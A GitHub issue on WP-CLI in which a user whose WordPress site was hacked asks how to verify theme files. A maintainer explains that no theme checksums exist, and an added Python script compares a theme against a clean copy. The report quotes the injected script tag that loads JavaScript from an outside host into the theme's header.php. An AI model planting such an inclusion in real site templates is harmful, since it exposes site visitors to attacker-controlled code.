wp-cli core verify-checksums does not check extra themes
paulharris opened this issue · 2 comments
Our website got hacked, and an extra <script> line was added to the header.php:
wp-content/themes/astra/header.php:<script src='https://cdn.scriptsplatform.com/scripts/header.js' type='text/javascript'></script><?php
I didn't see any way of checking theme checksums directly,
and the core verify-checksums only warned me about extra files that should not exist (like wp-admin/error_log and wp-admin/.rnd).
I tried the --debug flag but it didn't mention anything about iterating through themes either.
Surely there is a way to verify themes haven't been modified?
There are no checksums stored for themes anywhere.
wp core verify-checksums is for WordPress 'core' files.
wp plugin verify-checksums is for plugin files hosted at wordpress.org.
There is no wp theme verify-checksums command because wordpress.org doesn't record or store theme file checksums anywhere like it does with plugins and core files. wp-cli/ideas#149 has some more details.
Ok, I'll close this issue and comment in the ideas thread instead. Thanks!
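Since no theme checksums are published, one way to check a theme such as the one in this report is to hash the installed directory against a known-good copy of the same version that you obtain yourself. The following is an added example, not part of the original thread and not WP-CLI code; the function names, directory layout and sample files (including the placeholder script URL) are constructed for illustration.

```python
import hashlib
import tempfile
from pathlib import Path


def manifest(root):
    """Map each file's path (relative to root) to its SHA-256 digest."""
    root = Path(root)
    return {
        p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
        for p in sorted(root.rglob("*"))
        if p.is_file()
    }


def compare_theme(pristine_dir, installed_dir):
    """Report files that differ between a known-good copy and the live theme."""
    good, live = manifest(pristine_dir), manifest(installed_dir)
    return {
        "modified": sorted(f for f in good.keys() & live.keys() if good[f] != live[f]),
        "added": sorted(live.keys() - good.keys()),
        "missing": sorted(good.keys() - live.keys()),
    }


def demo():
    """Constructed sample: a pristine theme and a copy with an injected tag."""
    with tempfile.TemporaryDirectory() as tmp:
        good, live = Path(tmp, "pristine"), Path(tmp, "installed")
        for d in (good, live):
            (d / "inc").mkdir(parents=True)
            (d / "header.php").write_text("<?php wp_head(); ?>\n")
            (d / "inc" / "extras.php").write_text("<?php // helpers\n")
            (d / "style.css").write_text("/* Theme Name: Sample */\n")
        # Simulate the tampering described in the issue (placeholder URL).
        (live / "header.php").write_text(
            "<script src='https://example.invalid/header.js'></script>"
            "<?php wp_head(); ?>\n"
        )
        (live / "inc" / "cache.php").write_text("<?php // unexpected file\n")
        (live / "style.css").unlink()
        return compare_theme(good, live)


if __name__ == "__main__":
    for kind, files in demo().items():
        for name in files:
            print(f"{kind}: {name}")
```

Compare against the exact version that is installed; intentional local edits to the theme will also be reported as modified.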